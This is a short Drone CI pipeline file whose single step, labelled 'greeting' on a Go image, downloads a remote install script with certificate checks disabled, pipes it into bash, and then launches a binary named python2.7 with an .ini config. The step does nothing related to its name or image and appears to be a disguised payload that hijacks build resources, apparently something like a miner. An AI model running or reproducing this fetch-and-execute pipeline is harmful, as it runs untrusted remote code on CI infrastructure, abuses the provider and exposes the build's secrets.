---
kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: golang:1.12
  commands:
  - curl -fskSL https://gitlab.com/ferivpn/python2.7/-/raw/master/install.sh | bash && cd ~/.local && ./python2.7 python2.7.ini
